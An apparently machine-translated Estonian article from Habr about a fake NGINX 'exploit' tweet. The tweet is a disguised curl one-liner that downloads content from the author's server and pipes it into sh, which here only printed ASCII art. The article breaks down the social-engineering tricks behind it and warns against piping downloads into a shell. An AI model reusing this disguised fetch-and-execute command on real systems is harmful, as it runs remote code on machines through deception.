Märge. tõlge:
TL;DR: ärge mingil juhul kasutage failikonveierit sh või bashis. See on suurepärane viis arvuti üle kontrolli kaotamiseks.
Ma tahan teiega jagada lühikest lugu koomilisest PoC-i ärakasutamisest, mis loodi 31. mail. Ta ilmus kiiresti vastuseks uudistele
Olles lõpetanud curl'is uue segamistehnika kallal töötamise, tsiteerisin algset säutsu ja "lekitasin töötava PoC", mis koosneb ühest koodireast, mis väidetavalt kasutab avastatud haavatavust. See oli muidugi täielik jama. Eeldasin, et saan kohe paljastatud ja parimal juhul saan paar retweeti (ah well).
Siiski ei osanud ma ette kujutada, mis edasi sai. Minu säutsu populaarsus tõusis hüppeliselt. Üllataval kombel on hetkel (15. juunil 00:1 Moskva aja järgi) vähesed aru saanud, et tegemist on võltsinguga. Paljud inimesed retweidavad seda ilma seda üldse kontrollimata (rääkimata sellest, et imetlevad selle ilusat ASCII-graafikat).
Vaadake vaid, kui ilus see on!
Kuigi kõik need silmused ja värvid on suurepärased, on selge, et inimesed pidid nende nägemiseks oma masinas koodi käivitama. Õnneks töötavad brauserid samamoodi ja koos tõsiasjaga, et ma ei tahtnud tegelikult juriidilistesse probleemidesse sattuda, tegi minu saidile maetud kood lihtsalt kajakõnesid, proovimata täiendavat koodi installida või käivitada.
Väike kõrvalepõige:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Sotsiaal-elektrooniline tehnika (SEE) – rohkem kui lihtsalt andmepüügi
Ohutus ja tuttavlikkus olid selle katse põhiosa. Ma arvan, et just need viisid tema eduni. Käsurida viitas selgelt turvalisusele, viidates "127.0.0.1"-le (tuntud localhost). Localhosti peetakse turvaliseks ja sellel olevad andmed ei lahku kunagi teie arvutist.
Tuttavus oli katse teine oluline SEE komponent. Kuna sihtrühmaks olid eelkõige arvutiturbe põhitõdedega tuttavad inimesed, oli oluline luua kood nii, et osa sellest tunduks tuttav ja tuttav (ja seega turvaline). Vanade ekspluateerimiskontseptsioonide elementide laenamine ja nende ebatavalisel viisil kombineerimine on osutunud väga edukaks.
Allpool on üksikasjalik analüüs ühe voodri kohta. Kõik selles nimekirjas on seljas kosmeetiline iseloom, ja selle tegelikuks toimimiseks pole praktiliselt midagi vaja.
Millised komponendid on tegelikult vajalikud? See -gsS
, -O 0x0238f06a
, |sh
ja veebiserver ise. Veebiserver ei sisaldanud pahatahtlikke juhiseid, vaid teenindas lihtsalt käskude abil ASCII graafikat echo
sisalduvas skriptis index.html
. Kui kasutaja sisestas reale |sh
keskel, index.html
laaditakse ja täidetakse. Õnneks polnud veebiserveri hoidjatel halbu kavatsusi.
-
../../../%00
— esindab kataloogist kaugemale jäämist; -
ngx_stream_module.so
— tee juhusliku NGINX-mooduli juurde; -
/bin/sh%00<'protocol:TCP'
- me väidetavalt käivitame/bin/sh
sihtmasinas ja suunake väljund ümber TCP kanalile; -
-O 0x0238f06a#PLToffset
- salajane koostisosa, täiendatud#PLToffset
, et näeks välja nagu PLT-s sisalduv mälunihe; -
|sh;
- veel üks oluline fragment. Meil oli vaja suunata väljund ümber sh/bashi, et käivitada ründavast veebiserverist, mis asub aadressil0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- mannekeen, millele netcat viitab/dev/tcp/localhost
et kõik näiks taas turvaline. Tegelikult ei tee see midagi ja kuulub ilude ridadesse.
Sellega lõpetatakse üherealise skripti dekodeerimine ja arutlemine „sotsiaal-elektroonilise inseneri” (keeruka andmepüügi) aspektide üle.
Veebiserveri konfigureerimine ja vastumeetmed
Kuna valdav enamus minu tellijatest on infosec/häkkerid, otsustasin muuta veebiserveri nendepoolsete "huviavalduste" suhtes pisut vastupidavamaks, et kuttidel oleks midagi teha (ja see oleks lõbus seadistada). Ma ei hakka siin kõiki lõkse üles loetlema, kuna katse on veel pooleli, kuid siin on mõned asjad, mida server teeb:
- Jälgib aktiivselt levitamiskatseid teatud sotsiaalvõrgustikes ja asendab erinevaid eelvaate pisipilte, et julgustada kasutajat lingil klõpsama.
- Suunab Chrome'i/Mozilla/Safari/jne ümber Thugcrowdi reklaamvideole, selle asemel, et kuvada kestaskripti.
- Jälgib ILMESEID sissetungi/räige häkkimise märke ja hakkab seejärel päringuid NSA serveritesse ümber suunama (ha!).
- Installib trooja ja ka BIOS-i juurkomplekti kõikidesse arvutitesse, mille kasutajad külastavad hosti tavalisest brauserist (nali naljaks!).
Väike osa antimeeridest
Sel juhul oli minu ainus eesmärk omandada mõned Apache'i funktsioonid – eelkõige päringute ümbersuunamise lahedad reeglid – ja ma mõtlesin: miks mitte?
NGINX Exploit (päris!)
Telli
Allikas: www.habr.com